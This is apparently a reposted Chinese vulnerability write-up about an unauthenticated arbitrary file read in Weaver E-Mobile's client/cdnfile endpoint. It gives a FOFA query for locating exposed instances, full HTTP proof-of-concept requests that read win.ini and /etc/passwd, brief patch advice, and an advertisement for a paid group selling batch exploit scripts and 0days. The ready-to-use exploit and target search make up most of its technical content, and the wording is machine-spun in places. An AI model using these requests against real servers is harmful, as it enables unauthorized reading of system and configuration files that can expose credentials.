0x01 免责声明
免责声明
请勿利用文案内的关联技术从事违法测试,因为传播、利用此文所供给的信息而导致的任何直接或间接的后果及损失,均由运用者自己负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。这次测试仅供学习运用,如若违法他用,与平台和本文作者无关,需自动负责!!!
0x02
制品介绍 泛微E-Mobile是一款由泛微网络科技股份有限机构研发的移动办公制品,该制品专门为手机、平板电脑等移动终端用户设计,旨在供给方便、有效的移动办公体验。适用于企业高管和有移动办公需要的业务部关联员工运用,尤其适合于已有内部OA系统的大中型企业公司,尤其是企业或分部有较多的分支公司。近期推出的鸿蒙原生应用基线版本就实现了跨设备联动、应用接续等创新功能,为用户带来更加有效、方便的移动办公体验。将来,泛微E-Mobile将继续引领数字化办公浪潮,为更加多企业供给优秀的移动办公处理方法。0x03
漏洞威胁 泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞,未经身份验证攻击者可经过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,引起网站处在极度不安全状态。0x04
漏洞环境
FOFA: app="泛微-EMobile"
0x05
漏洞复现
Windows-PoC GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: close
Linux-PoC GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: close
0x06
批量脚本验证
Nuclei验证脚本已发布 知识星球:冷漠安全
0x07
修复意见
临时缓解方法
接口设置拜访权限或限制拜访来源位置,如非必要,不要将系统开放在互联网上。
升级修复方法
日前官方已发布安全补丁,意见受影响用户尽快升级至安全版本 https://www.weaver.com.cn/
0x08
加入咱们
漏洞详情及批量检测POC工具请前往知识星球获取
知识星球:冷漠安全 交个伴侣,限时优惠券:加入立减25
星球福利:每日更新最新漏洞POC、资料文献、内部工具等
「星球介绍」:
本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。
本星球保持每日分享有些攻防知识,包含攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、处理方法、安全运营、安全体系、安全培训和安全标准等文库。
本星主已加入几十余个付费星球,定时汇聚高质量资料及工具进行星球分享。
「星球服务」:
加入星球,你会得到:
♦ 批量验证漏洞POC脚本
♦ 0day、1day分享
♦ 汇集其它付费星球资源分享
♦ 海量的红蓝对抗实战资源
♦ 优秀的内部红蓝工具及插件
♦ 综合类别优秀Wiki文库及漏洞库
♦ 提问及技术交流
|